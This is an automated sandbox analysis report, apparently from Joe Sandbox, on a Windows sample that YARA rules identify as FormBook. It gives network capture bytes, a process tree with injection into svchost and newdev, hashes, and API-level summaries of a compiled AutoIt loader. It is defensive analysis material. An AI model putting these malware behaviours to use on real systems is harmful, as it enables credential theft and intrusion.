Jan 11, 2025 00:08:43.185262918 CET	1236	IN	Data Raw: 6d 57 42 62 55 37 74 45 78 6b 68 56 77 33 36 79 7a 33 48 43 6d 30 71 45 76 45 5a 39 43 37 76 44 59 5a 65 57 41 51 68 6e 4b 6b 51 55 47 2f 69 37 4e 44 6e 43 4c 2f 68 77 62 76 4a 72 36 6d 69 50 4b 48 54 61 4f 45 35 34 78 70 42 47 72 6c 38 52 49 58 Data Ascii: mWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPex3NaIQLwHIIQlQkPbwsRFpdmdb/hD8TSDCwTBu8W30sSIiS7P9NwZ7CgAeDjlaM9ktAD0+Mxwrse8XsTaMoRIoCaZmg3BQgLqrHVCBu3qhW3+AA
Jan 11, 2025 00:08:43.185275078 CET	1236	IN	Data Raw: 49 2b 4e 68 31 5a 57 35 4d 34 63 68 4a 35 79 75 4e 52 4d 41 6e 76 37 54 68 30 50 77 50 37 34 70 54 6c 39 55 6a 50 5a 38 47 6a 31 39 50 59 53 6e 30 53 31 46 51 47 32 56 66 47 76 53 50 71 78 72 70 35 32 6d 42 4e 36 49 32 35 6e 32 43 54 42 4f 4f 52 Data Ascii: I+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/
Jan 11, 2025 00:08:43.185303926 CET	1236	IN	Data Raw: 20 20 20 20 20 20 77 69 64 74 68 3a 20 37 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 Data Ascii: width: 70%; } .status-code { font-size: 900%; } .status-reason { font-size: 450%; } } </style> </head> <body> <div cl
Jan 11, 2025 00:08:43.185317039 CET	724	IN	Data Raw: 62 6f 6f 2e 78 79 7a 2f 63 70 5f 65 72 72 6f 72 64 6f 63 75 6d 65 6e 74 2e 73 68 74 6d 6c 20 28 70 6f 72 74 20 38 30 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 Data Ascii: boo.xyz/cp_errordocument.shtml (port 80) </div> </li> <li class="info-server"></li> </ul> </div> </div> </secti
Jan 11, 2025 00:08:43.185410976 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	18:05:37
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\25IvlOVEB1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\25IvlOVEB1.exe"
Imagebase:	0x70000
File size:	1'170'432 bytes
MD5 hash:	946477DA917EDE9B7E4B05BAAF618D9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:05:38
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\25IvlOVEB1.exe"
Imagebase:	0xf80000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2966520608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2968336091.00000000062B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2967226346.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:06:50
Start date:	10/01/2025
Path:	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe"
Imagebase:	0xce0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4050246258.0000000002610000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	18:06:52
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\newdev.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\newdev.exe"
Imagebase:	0xca0000
File size:	67'584 bytes
MD5 hash:	4C2EACBE19E43DCEC83534AE1A8738B8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4050165664.0000000004560000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4050217084.00000000045B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4048784369.0000000000890000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	18:07:04
Start date:	10/01/2025
Path:	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe"
Imagebase:	0xce0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4049320310.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	18:07:17
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	5.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	43

Executed Functions

Function 00073B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00073B68
IsDebuggerPresent.KERNEL32 ref: 00073B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,001352F8,001352E0,?,?), ref: 00073BEB

Part of subcall function 00077BCC: _memmove.LIBCMT ref: 00077C06

Part of subcall function 0008092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00073C14,001352F8,?,?,?), ref: 0008096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00073C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00127770,00000010), ref: 000AD281
SetCurrentDirectoryW.KERNEL32(?,001352F8,?,?,?), ref: 000AD2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00124260,001352F8,?,?,?), ref: 000AD33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 000AD346

Part of subcall function 00073A46: GetSysColorBrush.USER32(0000000F), ref: 00073A50
Part of subcall function 00073A46: LoadCursorW.USER32(00000000,00007F00), ref: 00073A5F
Part of subcall function 00073A46: LoadIconW.USER32(00000063), ref: 00073A76
Part of subcall function 00073A46: LoadIconW.USER32(000000A4), ref: 00073A88
Part of subcall function 00073A46: LoadIconW.USER32(000000A2), ref: 00073A9A
Part of subcall function 00073A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00073AC0
Part of subcall function 00073A46: RegisterClassExW.USER32(?), ref: 00073B16

Part of subcall function 000739D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00073A03
Part of subcall function 000739D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00073A24
Part of subcall function 000739D5: ShowWindow.USER32(00000000,?,?), ref: 00073A38
Part of subcall function 000739D5: ShowWindow.USER32(00000000,?,?), ref: 00073A41

Part of subcall function 0007434A: _memset.LIBCMT ref: 00074370
Part of subcall function 0007434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00074415

Strings

This is a third-party compiled AutoIt script., xrefs: 000AD279
runas, xrefs: 000AD33A

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: e97230941930879dcd0a57f7d0b45131928cb3830cf101af2159db0ef18edcba
Instruction ID: 26bf7bdc84342eaf28c3d6e5d0e178003b7b5ac726e0d4a1890196e22dfc42f3
Opcode Fuzzy Hash: e97230941930879dcd0a57f7d0b45131928cb3830cf101af2159db0ef18edcba
Instruction Fuzzy Hash: DF51E671D08109EAEB11EBB4DC06AFE7BB5AF05B40F00C065F459A21A3CB684645EB25

Function 000749A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 000749CD

Part of subcall function 00077BCC: _memmove.LIBCMT ref: 00077C06

GetCurrentProcess.KERNEL32(?,000FFAEC,00000000,00000000,?), ref: 00074A9A
IsWow64Process.KERNEL32(00000000), ref: 00074AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00074AE7
FreeLibrary.KERNEL32(00000000), ref: 00074AF2
GetSystemInfo.KERNEL32(00000000), ref: 00074B23
GetSystemInfo.KERNEL32(00000000), ref: 00074B2F

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: f4440403c84fc697f47a3cef41007da3f95d6bd2e6903b17efd88efa90479c5d
Instruction ID: cb29cfd3c079675b64276a0dd568b18235b4c6951c09a7cee1fc64ffa1d1e2b0
Opcode Fuzzy Hash: f4440403c84fc697f47a3cef41007da3f95d6bd2e6903b17efd88efa90479c5d
Instruction Fuzzy Hash: 8D919231D897C1DAC771DB6884505AABFF5AF2A300B44895ED0CB93A41D728B908D75E

Function 00074E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00074D8E,?,?,00000000,00000000), ref: 00074E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00074D8E,?,?,00000000,00000000), ref: 00074EB0
LoadResource.KERNEL32(?,00000000,?,?,00074D8E,?,?,00000000,00000000,?,?,?,?,?,?,00074E2F), ref: 000AD937
SizeofResource.KERNEL32(?,00000000,?,?,00074D8E,?,?,00000000,00000000,?,?,?,?,?,?,00074E2F), ref: 000AD94C
LockResource.KERNEL32(00074D8E,?,?,00074D8E,?,?,00000000,00000000,?,?,?,?,?,?,00074E2F,00000000), ref: 000AD95F

Strings

SCRIPT, xrefs: 00074EA6

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: f48f1d1ee956599d3a640eb40e3e8a81936adb8a03af644573f88de734de66dd
Instruction ID: 345df4571b87ce9b16f90bf07b89a8150ac567f10b0665fcdc0bc98235b53620
Opcode Fuzzy Hash: f48f1d1ee956599d3a640eb40e3e8a81936adb8a03af644573f88de734de66dd
Instruction Fuzzy Hash: FE118C70600301ABE7208B65EC88F377BBAEFC5B61F108268F40A86650DB65E800D670

Function 0007FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 068025596010d764232d567e780e1d43eb12c4e04284e6d99dbb4bb991af4bcc
Instruction ID: 9bda3dcdec363a8de08d2f7c7f8ac65f4adf303815f7f100e02c716aa73afa27
Opcode Fuzzy Hash: 068025596010d764232d567e780e1d43eb12c4e04284e6d99dbb4bb991af4bcc
Instruction Fuzzy Hash: B0929B70A083418FD760DF28C480B6BB7E1BF85304F14896DE99A9B362D775ED49CB92

Function 000D445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,000AE398), ref: 000D446A
FindFirstFileW.KERNELBASE(?,?), ref: 000D447B
FindClose.KERNEL32(00000000), ref: 000D448B

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 1052da09f895e202e5927016392c0d126a8b12c906aecb033d3d765e30750699
Instruction ID: fdc0e865c9c3cc33c765481b20716cb1e6ed88e5a64bced0c7e67791d6d1cf79
Opcode Fuzzy Hash: 1052da09f895e202e5927016392c0d126a8b12c906aecb033d3d765e30750699
Instruction Fuzzy Hash: 47E0D8324106016752106B38EC4D4FA779C9F05335F100716F835C12D0EB785940E9A5

Function 0007E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 000B3E62

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: d51c298a2bbedbee48041f99ed6eeb3196087da970b76ea53db12fb84cac15de
Instruction ID: 6e4916015aa2bb6770ec53d36528a7a887a7478054a5097da4f6bb8f44ae3528
Opcode Fuzzy Hash: d51c298a2bbedbee48041f99ed6eeb3196087da970b76ea53db12fb84cac15de
Instruction Fuzzy Hash: A5A27A74E01245DBCB64CF58C480AAEB7F1FB58314F24C4A9E909AB352D739ED42CB99

Function 000809D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00080A5B
timeGetTime.WINMM ref: 00080D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00080E53
Sleep.KERNEL32(0000000A), ref: 00080E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00080EFA
DestroyWindow.USER32 ref: 00080F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00080F20
Sleep.KERNEL32(0000000A,?,?), ref: 000B4E83
TranslateMessage.USER32(?), ref: 000B5C60
DispatchMessageW.USER32(?), ref: 000B5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000B5C82

Strings

@GUI_CTRLHANDLE, xrefs: 000B4FE4
@COM_EVENTOBJ, xrefs: 000B54F0
@TRAY_ID, xrefs: 000B578F
@GUI_CTRLID, xrefs: 000B4F3A
@GUI_WINHANDLE, xrefs: 000B4F8F

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 00e286c366b6b4e34eac293c011203ba091207257abbddc8434963a2714c3bba
Instruction ID: e663513d0cc07f4f882554ef03392ad4c876ab116f0d37d535a5a63fb3985cfc
Opcode Fuzzy Hash: 00e286c366b6b4e34eac293c011203ba091207257abbddc8434963a2714c3bba
Instruction Fuzzy Hash: 77B2D070608741DFD768DF24C884BEEB7E5BF84304F14895DE599972A2CB75E888CB82

Function 000D9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000D8F5F: __time64.LIBCMT ref: 000D8F69

Part of subcall function 00074EE5: _fseek.LIBCMT ref: 00074EFD

__wsplitpath.LIBCMT ref: 000D9234

Part of subcall function 000940FB: __wsplitpath_helper.LIBCMT ref: 0009413B

_wcscpy.LIBCMT ref: 000D9247
_wcscat.LIBCMT ref: 000D925A
__wsplitpath.LIBCMT ref: 000D927F
_wcscat.LIBCMT ref: 000D9295
_wcscat.LIBCMT ref: 000D92A8

Part of subcall function 000D8FA5: _memmove.LIBCMT ref: 000D8FDE
Part of subcall function 000D8FA5: _memmove.LIBCMT ref: 000D8FED

_wcscmp.LIBCMT ref: 000D91EF

Part of subcall function 000D9734: _wcscmp.LIBCMT ref: 000D9824
Part of subcall function 000D9734: _wcscmp.LIBCMT ref: 000D9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000D9452
_wcsncpy.LIBCMT ref: 000D94C5
DeleteFileW.KERNEL32(?,?), ref: 000D94FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000D9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000D9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000D9534

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 8985036eabf87d41ed84f4e3e523116561700b14359646aaff7b5af63a074700
Instruction ID: 446ea1e44e23a537daba173baa3b39f1f3948c6be5922e8853c2f6c0869141da
Opcode Fuzzy Hash: 8985036eabf87d41ed84f4e3e523116561700b14359646aaff7b5af63a074700
Instruction Fuzzy Hash: CCC14CB1D00219ABDF21DF95CC85EEEB7BDEF45310F0040AAF609E6252EB309A459F65

Function 0007301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00073074
RegisterClassExW.USER32(00000030), ref: 0007309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000730AF
InitCommonControlsEx.COMCTL32(?), ref: 000730CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000730DC
LoadIconW.USER32(000000A9), ref: 000730F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00073101

Strings

0, xrefs: 00073056
AutoIt v3 GUI, xrefs: 00073090
TaskbarCreated, xrefs: 000730A4
+, xrefs: 0007305D

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: f5bcf874409184a516477e52a0f4aab6c0a7a97d6fbd49d0f354ba92a8ba4315
Instruction ID: d38a95e92293ecef1bd7a410c7b673c51b6bbb825afccb7307f324cb13e5f303
Opcode Fuzzy Hash: f5bcf874409184a516477e52a0f4aab6c0a7a97d6fbd49d0f354ba92a8ba4315
Instruction Fuzzy Hash: 333156B180030AEFDB009FA4D884AE9BFF1FF09710F10456AE580EA6A0D3B90585DF90

Function 00073041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00073074
RegisterClassExW.USER32(00000030), ref: 0007309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000730AF
InitCommonControlsEx.COMCTL32(?), ref: 000730CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000730DC
LoadIconW.USER32(000000A9), ref: 000730F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00073101

Strings

0, xrefs: 00073056
AutoIt v3 GUI, xrefs: 00073090
TaskbarCreated, xrefs: 000730A4
+, xrefs: 0007305D

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 14dab23a68ffbd2bf411f2e32c1a45c4f637a68581eb1b83d586f02bb2adbfe8
Instruction ID: 04b9c6d3409943a62d9ef301454aa0facc45e734fc8fa91c54f83ea70678d017
Opcode Fuzzy Hash: 14dab23a68ffbd2bf411f2e32c1a45c4f637a68581eb1b83d586f02bb2adbfe8
Instruction Fuzzy Hash: C621C8B1901319EFEB00DF95EC89BADBBF5FB08710F00416AF610A66A0D7B54584DF95

